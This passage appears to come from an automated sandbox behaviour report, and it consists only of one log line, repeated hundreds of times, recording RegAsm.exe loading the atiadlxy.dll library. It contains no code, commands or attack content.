                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
